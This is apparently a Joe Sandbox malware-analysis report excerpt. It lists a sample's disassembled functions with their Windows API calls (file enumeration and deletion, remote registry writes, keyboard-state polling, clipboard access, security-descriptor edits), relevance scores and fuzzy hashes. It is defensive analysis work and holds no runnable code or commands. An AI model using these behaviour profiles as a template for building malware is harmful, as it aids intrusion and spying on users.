                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: ba36ff178ab821e6d2d745c5e285d959ba0572101db57351f20d8f4b2600065d
                                                  • Instruction ID: cd85d750cc6d96565563990eb1906021d3f9ce5bce5f657a2013ebd7320b15ea
                                                  • Opcode Fuzzy Hash: ba36ff178ab821e6d2d745c5e285d959ba0572101db57351f20d8f4b2600065d
                                                  • Instruction Fuzzy Hash: 17A12AB1408348AFC714EFA4C885EBFB7ECBF95704F404969F69587191EA34DA48CB62
                                                  Function 00C5EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C5EFB6
                                                  • _wcscmp.LIBCMT ref: 00C5EFCB
                                                  • _wcscmp.LIBCMT ref: 00C5EFE2
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C5EFF4
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00C5F00E
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C5F026
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F031
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C5F04D
                                                  • _wcscmp.LIBCMT ref: 00C5F074
                                                  • _wcscmp.LIBCMT ref: 00C5F08B
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5F09D
                                                  • SetCurrentDirectoryW.KERNEL32(00CA8920), ref: 00C5F0BB
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5F0C5
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F0D2
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F0E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 38e6b3fbcc40fc99341bc1ac00d343bf5ae6e1e824d691039169d05d8dfcd587
                                                  • Instruction ID: 07e73842d289490c681331b3f7273c7a966a5b345a1506901497da65befcc5b8
                                                  • Opcode Fuzzy Hash: 38e6b3fbcc40fc99341bc1ac00d343bf5ae6e1e824d691039169d05d8dfcd587
                                                  • Instruction Fuzzy Hash: AF31D4365002196BCB189BB4DC88BEE77AC9F85361F144179E818D20E1EB70DBCADB65
                                                  Function 00C70857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70953
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C7F910,00000000,?,00000000,?,?), ref: 00C709C1
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C70A09
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C70A92
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C70DB2
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C70DBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: d5e8e7b920b7937cf77576e75815ec37060d100d0985af5cac5c31109f8d5238
                                                  • Instruction ID: 923eb57269d7804cef49d8635ef5df23af1354e1f712b8b3b016eb431adbcc33
                                                  • Opcode Fuzzy Hash: d5e8e7b920b7937cf77576e75815ec37060d100d0985af5cac5c31109f8d5238
                                                  • Instruction Fuzzy Hash: 340259756006019FCB14EF24C881E2AB7E5FF89754F14899CF99A9B3A2DB30ED45CB81
                                                  Function 00C5F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C5F113
                                                  • _wcscmp.LIBCMT ref: 00C5F128
                                                  • _wcscmp.LIBCMT ref: 00C5F13F
                                                    • Part of subcall function 00C54385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C543A0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C5F16E
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F179
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C5F195
                                                  • _wcscmp.LIBCMT ref: 00C5F1BC
                                                  • _wcscmp.LIBCMT ref: 00C5F1D3
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5F1E5
                                                  • SetCurrentDirectoryW.KERNEL32(00CA8920), ref: 00C5F203
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5F20D
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F21A
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F22C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 6db4b231dd730006816f0281469c7fc0f2df5aa5e63c5a368072c73503b44666
                                                  • Instruction ID: 03c94fdf450f040531350467d9c8b8f8850db661fe70c650ecab45e6d07ba4d4
                                                  • Opcode Fuzzy Hash: 6db4b231dd730006816f0281469c7fc0f2df5aa5e63c5a368072c73503b44666
                                                  • Instruction Fuzzy Hash: E731C67A5001196ADB189A64EC85FEE77AC9F45365F100179EC14A20A0EB30DBCADA58
                                                  Function 00C5A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C5A20F
                                                  • __swprintf.LIBCMT ref: 00C5A231
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5A26E
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C5A293
                                                  • _memset.LIBCMT ref: 00C5A2B2
                                                  • _wcsncpy.LIBCMT ref: 00C5A2EE
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C5A323
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C5A32E
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00C5A337
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C5A341
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: cf01fcfb5e386a8ef3d8c3b3372ab8cecd47dd7028f96caca24a23732a707eea
                                                  • Instruction ID: 26899f9b275fc1d4133385572b8e4d35589b5425add77ae88de32b554e461d13
                                                  • Opcode Fuzzy Hash: cf01fcfb5e386a8ef3d8c3b3372ab8cecd47dd7028f96caca24a23732a707eea
                                                  • Instruction Fuzzy Hash: D731A075904109ABDB219FA1DC89FEF37BCAF89705F1041BAF908D2161EB7097858B25
                                                  Function 00C47CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C48202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C4821E
                                                    • Part of subcall function 00C48202: GetLastError.KERNEL32(?,00C47CE2,?,?,?), ref: 00C48228
                                                    • Part of subcall function 00C48202: GetProcessHeap.KERNEL32(00000008,?,?,00C47CE2,?,?,?), ref: 00C48237
                                                    • Part of subcall function 00C48202: HeapAlloc.KERNEL32(00000000,?,00C47CE2,?,?,?), ref: 00C4823E
                                                    • Part of subcall function 00C48202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48255
                                                    • Part of subcall function 00C4829F: GetProcessHeap.KERNEL32(00000008,00C47CF8,00000000,00000000,?,00C47CF8,?), ref: 00C482AB
                                                    • Part of subcall function 00C4829F: HeapAlloc.KERNEL32(00000000,?,00C47CF8,?), ref: 00C482B2
                                                    • Part of subcall function 00C4829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C47CF8,?), ref: 00C482C3
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C47D13
                                                  • _memset.LIBCMT ref: 00C47D28
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C47D47
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C47D58
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C47D95
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C47DB1
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C47DCE
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C47DDD
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C47DE4
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C47E05
                                                  • CopySid.ADVAPI32(00000000), ref: 00C47E0C
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C47E3D
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C47E63
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C47E77
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 72a7b35f87566237830a7d0d5e66b4d587f52641cef15c3323a7ce7d71376919
                                                  • Instruction ID: b79fd0af427047799e70fd6ebc4101587bda97adf0e657208c2bc50ed0dfbcd9
                                                  • Opcode Fuzzy Hash: 72a7b35f87566237830a7d0d5e66b4d587f52641cef15c3323a7ce7d71376919
                                                  • Instruction Fuzzy Hash: 46613871904209AFDF10DFA4DC85EEEBBB9FF04300F048269F925A7291DB719A46DB60
                                                  Function 00C066E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                  • API String ID: 0-4052911093
                                                  • Opcode ID: 49322fb40f1bd1545a19e3ac4cc5b58677ea4e66de529e791605d25d4aea5411
                                                  • Instruction ID: d6408a33ad60ab54ba211164d2f9c51f0eebb762fde7ad09cbd6abe2adfb1735
                                                  • Opcode Fuzzy Hash: 49322fb40f1bd1545a19e3ac4cc5b58677ea4e66de529e791605d25d4aea5411
                                                  • Instruction Fuzzy Hash: D57260B5E00219DBDF24CF59C8807AEB7B5FF44710F14816AE859EB291EB709E81DB90
                                                  Function 00C5001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00C50097
                                                  • SetKeyboardState.USER32(?), ref: 00C50102
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00C50122
                                                  • GetKeyState.USER32(000000A0), ref: 00C50139
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00C50168
                                                  • GetKeyState.USER32(000000A1), ref: 00C50179
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00C501A5
                                                  • GetKeyState.USER32(00000011), ref: 00C501B3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00C501DC
                                                  • GetKeyState.USER32(00000012), ref: 00C501EA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00C50213
                                                  • GetKeyState.USER32(0000005B), ref: 00C50221
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: d0c1dcbb8309051bfb53424747db90d3b62d3200e8bd243b5527b147cb2c7b90
                                                  • Instruction ID: d8f4a6f09167051afab637e4473c371a8609309f571a6e6e8f52dbb5ac012ead
                                                  • Opcode Fuzzy Hash: d0c1dcbb8309051bfb53424747db90d3b62d3200e8bd243b5527b147cb2c7b90
                                                  • Instruction Fuzzy Hash: D251093890478829FB34DBA088547EEBFB49F01381F18459DCDD2965C3DAA49BCCC76A
                                                  Function 00C703DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C70E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C704AC
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C7054B
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C705E3
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C70822
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C7082F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: e30611a6a5abab3d1275277f0333bf39c80515b80d883bfcbe957da0ea66b803
                                                  • Instruction ID: 7a5dd97209dacc482c2b2215d3ea07258577655e91b9fc3fa46f2ee95e9b9c8a
                                                  • Opcode Fuzzy Hash: e30611a6a5abab3d1275277f0333bf39c80515b80d883bfcbe957da0ea66b803
                                                  • Instruction Fuzzy Hash: A1E15D31204204EFCB14DF29C891E2ABBE4FF89354F14C56DF95ADB2A1DA30E945CB92
                                                  Function 00C64164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: a3416a3d2bfabf955891d8830fcc420965c515edd86f5651595120cc24bf0bcf
                                                  • Instruction ID: 9d62c327f92f36151d6c8cefd982a9fb8ff5661684d0530df8612f6e2757d4b2
                                                  • Opcode Fuzzy Hash: a3416a3d2bfabf955891d8830fcc420965c515edd86f5651595120cc24bf0bcf
                                                  • Instruction Fuzzy Hash: 1721C1752002149FDB14AF24EC99B6E7BA8FF05750F10802AF94ADB2B1DB30AD82CF55
                                                  Function 00C537EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                    • Part of subcall function 00C54A31: GetFileAttributesW.KERNEL32(?,00C5370B), ref: 00C54A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C538A3
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C5394B
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C5395E
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C5397B
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5399D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C539B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 2d2f4a620b7fa654c33f65322ecaf59da74894b9a09719b3d7ffe7e262484d06
                                                  • Instruction ID: 167ab1a4dc75ccb0bf0fe881188a2b2b1abcf6f9cf630668b1b6201fd0108421
                                                  • Opcode Fuzzy Hash: 2d2f4a620b7fa654c33f65322ecaf59da74894b9a09719b3d7ffe7e262484d06
                                                  • Instruction Fuzzy Hash: 6C51C27580418CAACF15EBA0CD929FDB7B8AF15341F6040A9E906B7192EF706F4DCB64
                                                  Function 00C5F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C5F440
                                                  • Sleep.KERNEL32(0000000A), ref: 00C5F470
                                                  • _wcscmp.LIBCMT ref: 00C5F484
                                                  • _wcscmp.LIBCMT ref: 00C5F49F
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00C5F53D
                                                  • FindClose.KERNEL32(00000000), ref: 00C5F553
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: 4885176d8859d1d8901567264dda29f872e1dea99fe258f0243e2cb092e6a51c
                                                  • Instruction ID: 1f13b81015fc4d3365661876683d23d36adb8c0211d7ce32a7d2c37a63d731f1
                                                  • Opcode Fuzzy Hash: 4885176d8859d1d8901567264dda29f872e1dea99fe258f0243e2cb092e6a51c
                                                  • Instruction Fuzzy Hash: 1241907584020E9FCF14DF68CC45AEEBBB4FF05311F5040A9E919A3191EB309A8ADF54
                                                  Function 00C05760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: db5f1f7658ca22130073de9d07c6e3a4814d2c6afa4f698f391937dea8bb77ec
                                                  • Instruction ID: be32c5adcb14c499c5ccd49aa71ded6a1dedca34c75676ad0e52feb2ebac244a
                                                  • Opcode Fuzzy Hash: db5f1f7658ca22130073de9d07c6e3a4814d2c6afa4f698f391937dea8bb77ec
                                                  • Instruction Fuzzy Hash: D312AA70A00609DFCF04DFA5D981AEEB7F5FF48300F208569E946E7290EB36AA55DB50
                                                  Function 00C53B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                  Download Yara Rule
                                                  APIs
